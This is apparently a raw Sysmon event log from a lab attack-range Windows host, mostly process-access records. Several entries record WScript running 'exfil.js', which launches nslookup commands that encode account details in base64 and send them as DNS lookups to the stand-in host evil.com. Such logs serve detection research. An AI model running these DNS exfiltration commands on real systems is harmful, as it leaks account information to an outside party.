14:21:37.113{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210885Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.113{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210884Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.113{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210883Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.113{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-7044-000000005F02}7488C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210882Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.113{2E1864BB-18F1-629A-6E44-000000005F02}74842444C:\Windows\system32\cmd.exe{2E1864BB-18F1-629A-7044-000000005F02}7488C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210881Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.123{2E1864BB-18F1-629A-7044-000000005F02}7488C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F1-629A-6E44-000000005F02}7484C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbnfx.tmp 2>&1 10341000x8000000000000000210880Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.098{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F1-629A-6F44-000000005F02}1276C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210879Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.098{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F1-629A-6F44-000000005F02}1276C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210878Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.082{2E1864BB-18F1-629A-6F44-000000005F02}12762864C:\Windows\system32\conhost.exe{2E1864BB-18F1-629A-6E44-000000005F02}7484C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210877Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.082{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-6F44-000000005F02}1276C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210876Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.080{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210875Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.080{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210874Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.079{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210873Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.079{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210872Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.078{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-6E44-000000005F02}7484C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210871Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.078{2E1864BB-18E0-629A-6742-000000005F02}39767716C:\Windows\System32\WScript.exe{2E1864BB-18F1-629A-6E44-000000005F02}7484C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210870Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.078{2E1864BB-18F1-629A-6E44-000000005F02}7484C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbnfx.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000210869Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.060{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlekull.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210868Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.045{2E1864BB-18F1-629A-6C44-000000005F02}66606848C:\Windows\system32\conhost.exe{2E1864BB-18F1-629A-6D44-000000005F02}8052C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210867Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.045{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210866Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.045{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210865Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.045{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210864Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.045{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210863Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.045{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-6D44-000000005F02}8052C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210862Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.045{2E1864BB-18F0-629A-6B44-000000005F02}57647072C:\Windows\system32\cmd.exe{2E1864BB-18F1-629A-6D44-000000005F02}8052C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210861Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.047{2E1864BB-18F1-629A-6D44-000000005F02}8052C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F0-629A-6B44-000000005F02}5764C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlekull.tmp 2>&1 10341000x8000000000000000210860Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.014{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F1-629A-6C44-000000005F02}6660C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210859Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.014{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F1-629A-6C44-000000005F02}6660C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210858Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.014{2E1864BB-18F1-629A-6C44-000000005F02}66606848C:\Windows\system32\conhost.exe{2E1864BB-18F0-629A-6B44-000000005F02}5764C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210857Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.998{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-6C44-000000005F02}6660C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210856Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.998{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210855Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.998{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\